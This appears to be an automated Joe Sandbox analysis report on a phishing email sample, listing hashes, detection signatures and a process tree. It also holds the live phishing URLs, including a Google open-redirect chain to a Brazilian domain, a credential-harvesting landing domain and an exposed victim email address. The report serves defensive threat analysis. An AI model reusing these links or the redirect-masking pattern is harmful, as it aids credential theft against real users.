Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ee0b6b037b16b54632b6b37d1fb72727.eml

Overview

General Information

Sample name:ee0b6b037b16b54632b6b37d1fb72727.eml
Analysis ID:1556705
MD5:4b9e5facdef9a6a766716ef1a494d15c
SHA1:c7df5078fe1808cc06078c8d2629835732e97dc9
SHA256:4d156810843e3438e761c4f3cbfecaccd29c4b64b2ea6aa73e54aed5283cf120
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected potential phishing Email
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory
Stores large binary data to the registry

Classification

Process Tree

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6428 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\ee0b6b037b16b54632b6b37d1fb72727.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 7008 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "F05FBD8A-C85E-48DC-96FE-34574180FF3D" "A0019601-66DF-4798-A215-D39904F8E346" "6428" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 5156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1760,i,5962285065134541861,7824030978840373784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1964,i,10127388786673164989,1744962959261418216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 3344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1856,i,8679220859908409652,11221365071905276730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1996,i,17604088894808587731,15684709552865746859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Office Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

barindex
AI detected landing page (webpage, office document or email)
Source: EmailJoe Sandbox AI: Email contains prominent button: 'listen now'
AI detected potential phishing Email
Source: EmailJoe Sandbox AI: Detected potential phishing email: Suspicious sender domain 'generous-minds.com' doesn't match the claimed identity 'Audio.calls'. Contains suspicious long encoded URL that attempts to mask its true destination. Subject line about voicemail doesn't match the email thread content, indicating a spoofed conversation
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: f10d057c-a6fb-446a-b478-0b10ee8299684ce7d9d4-d301-4894-8db2-1a1014105236
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.comHTTP Parser: No favicon
Source: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.comHTTP Parser: No favicon
Source: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.comHTTP Parser: No favicon
Source: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
